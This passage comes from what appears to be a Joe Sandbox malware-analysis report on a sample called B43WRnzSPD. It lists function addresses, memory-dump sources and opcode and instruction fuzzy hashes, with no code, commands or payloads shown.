                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 414660179fbfd46231fb7b06a5e01a0f65dcbac103b1455ebc21e7cd3ea83882
                                                  • Instruction ID: 9c28282e0bb2b9a7b725cbd8544b422663380c98487ec188ea47770282af9374
                                                  • Opcode Fuzzy Hash: 414660179fbfd46231fb7b06a5e01a0f65dcbac103b1455ebc21e7cd3ea83882
                                                  • Instruction Fuzzy Hash: 9E81E461D0D7C497E6219B359A017EBB3E4AFE9304F099B29BD8C61113FB34BAD48352
                                                  Function 0096D430 Relevance: .2, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1bd93a42d8916e5af69e4b892f0a9bddde692e7a2a6c8426379dba794c89998c
                                                  • Instruction ID: 627fdcdf454b3ce7726de449855bb05425ad7868beff95e7ea1f9e723b1db75a
                                                  • Opcode Fuzzy Hash: 1bd93a42d8916e5af69e4b892f0a9bddde692e7a2a6c8426379dba794c89998c
                                                  • Instruction Fuzzy Hash: 50810CB2E15B828BD7148F28C8907B6B7A0FFDA354F144B1EE9E607782E7749581C781
                                                  Function 00966730 Relevance: .2, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b8284eeb1fd54dffc8bfc300e4f32af34c2751fffea56cb10db9f204161de503
                                                  • Instruction ID: 5a436ba5eba054766f1d17e214ac02c0a9a6a120ac405e97b362b32bd9bf7e3c
                                                  • Opcode Fuzzy Hash: b8284eeb1fd54dffc8bfc300e4f32af34c2751fffea56cb10db9f204161de503
                                                  • Instruction Fuzzy Hash: D681EA72D14BC28BD3148F64C8906BAB7A0FFDA354F249B1EE9EA17742E7749580C781
                                                  Function 009735B0 Relevance: .2, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6234f7dd64c63145ff9e74976a6edbd68e8f34f3b04e3bd02acb4aaffc0899e7
                                                  • Instruction ID: 4d69811e819d707b68d0410cf309aa227b84f74f8a953ec593d917110b71dfc3
                                                  • Opcode Fuzzy Hash: 6234f7dd64c63145ff9e74976a6edbd68e8f34f3b04e3bd02acb4aaffc0899e7
                                                  • Instruction Fuzzy Hash: A17178B3D087818BD7118F28C8802A97BA2AFC6314F28C76EF8995B353E7749A41D741
                                                  Function 018ECDFA Relevance: .2, Instructions: 184COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000003.1912517662.00000000018EB000.00000004.00000020.00020000.00000000.sdmp, Offset: 018EB000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_3_18eb000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce665a8490efe4c5593c9e8dde9602541cb113421dfef01a815cfcc5bae81002
                                                  • Instruction ID: 09a6491a458751ffea0e6353ceaf88e1e2bdcfeebc87443d0fa0da994e735ed8
                                                  • Opcode Fuzzy Hash: ce665a8490efe4c5593c9e8dde9602541cb113421dfef01a815cfcc5bae81002
                                                  • Instruction Fuzzy Hash: 2C71096154E7C19FC7038B3888A9A803FB0AE2721871E45DBC4C4CF5B3D66A591EDB23
                                                  Function 00794B60 Relevance: .2, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ece59671c26390a3c6294db90053195e6720b763273f3476a7e359e475199fc1
                                                  • Instruction ID: 5a8db2dff9cdf5e93e5f9e812c4dd08ad4ce49e097a5ad1fe6b46ca040d6786f
                                                  • Opcode Fuzzy Hash: ece59671c26390a3c6294db90053195e6720b763273f3476a7e359e475199fc1
                                                  • Instruction Fuzzy Hash: 9441F373F20A280BE34CD969AC6536A73C297C4310F4A463DDA96C73C1DC74ED16A6C0
                                                  Function 008BAB2C Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                  • Instruction ID: 0afd573ee3bae4b9acd8361487fddc3dea599e826047780ae59b2a5359bf3d0d
                                                  • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                  • Instruction Fuzzy Hash: 54F0AF33B612290B93A0CDBA6C001E6A2C3F3C0770F1F8565EC84D7602ED348C4686C6
                                                  Function 008BAAC0 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                  • Instruction ID: 29a04db36820042baf861052639714ece547814e7a5b5a5c7571e345a3cecb6a
                                                  • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                  • Instruction Fuzzy Hash: 03F08C33A20B340B6360CC7A8D05097A2C7A7C86B0B0FC969ECA0E7206E930EC0656D1
                                                  Function 00666810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: [
                                                  • API String ID: 0-784033777
                                                  • Opcode ID: 1f07b2d137647ae0e2b195e5b66a3d4da8cd1b3a39c4698d83a3f2e4c8907e0b
                                                  • Instruction ID: 005c0556320619dae17b73f2e7c732ca544467f85ed047e1ae6dbc86231c0f33
                                                  • Opcode Fuzzy Hash: 1f07b2d137647ae0e2b195e5b66a3d4da8cd1b3a39c4698d83a3f2e4c8907e0b
                                                  • Instruction Fuzzy Hash: FAB15871508382ABDB359A24F8907BBBBDBEB55304F18092DF8C5C6381EB65D85487A2